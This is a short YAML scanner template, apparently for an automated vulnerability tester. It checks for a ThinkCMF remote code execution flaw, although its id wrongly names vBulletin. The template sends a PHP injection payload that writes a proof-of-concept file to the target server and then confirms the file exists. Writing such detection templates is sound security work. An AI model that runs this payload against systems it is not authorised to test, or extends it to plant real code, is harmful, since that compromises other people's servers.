id: php-vbulletin-rce
single: true
info:
  name: ThinkCMF RCE
  risk: Critical

params:
  - root: "{{.BaseURL}}"

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/index.php?a=fetch&content=%3C?php+file_put_contents(%22poc.php%22,%22%3C?php+print(md5(13373311))%3B%22)%3B
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55

  # verify the poc
  - method: GET
    redirect: false
    url: >-
      {{.root}}/poc.php
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch('body', 'cc3edd8a98f001e6e8d3032221ed5425') && !StringSearch('body', 'Citrix Login')

reference:
  - link: https://www.freebuf.com/vuls/217586.html
